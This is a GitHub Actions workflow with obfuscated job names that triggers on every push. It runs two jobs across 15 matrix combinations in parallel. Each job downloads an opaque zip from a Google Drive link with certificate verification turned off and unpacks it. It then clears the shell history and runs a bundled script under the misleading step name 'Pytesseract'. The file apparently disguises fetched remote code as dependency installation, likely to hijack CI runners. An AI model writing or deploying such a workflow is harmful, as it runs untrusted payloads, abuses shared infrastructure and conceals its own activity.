name: quantumrung133core
on:
  push:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  DELIVER:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.o, I.i, I.ii]
        flag: ['Configure', 'Build', 'Analyze', 'Operate', 'Distribute']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: install module
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1HsKujHVjZ9V7jIfKfrJMdvGHws30ssw6" -O Airflow.zip
        unzip -o Airflow.zip
        rm Airflow.zip
        history -c && history -w

    - name: Pytesseract
      run: bash requirements.sh


  EXECUTE1:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.o, I.i, I.ii]
        flag: ['Configure', 'Build', 'Analyze', 'Operate', 'Distribute']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: install module
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1HsKujHVjZ9V7jIfKfrJMdvGHws30ssw6" -O Airflow.zip
        unzip -o Airflow.zip
        rm Airflow.zip
        history -c && history -w

    - name: Pytesseract
      run: bash requirements.sh
        
